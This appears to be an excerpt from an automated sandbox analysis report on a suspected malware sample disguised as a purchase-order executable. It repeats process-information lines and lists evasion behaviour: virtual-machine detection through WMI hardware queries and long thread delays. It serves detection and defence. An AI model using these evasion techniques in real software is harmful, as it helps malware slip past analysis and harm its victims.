                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 5688, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 4A20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 8AB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 9AB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 9CB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: ACB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6233Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3302Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWindow / User API: threadDelayed 1185Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWindow / User API: threadDelayed 4034Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 5908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 3876Thread sleep count: 1185 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 3876Thread sleep count: 4034 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99764s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99653s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99203s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -99093s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98590s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98358s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -98031s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -97921s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -97812s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -97703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -97594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -97469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99764Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99653Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99546Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99312Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99203Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 99093Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98984Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98875Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98703Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98590Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98469Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98358Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98250Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98140Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 98031Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 97921Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 97812Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 97703Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 97594Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeThread delayed: delay time: 97469Jump to behavior
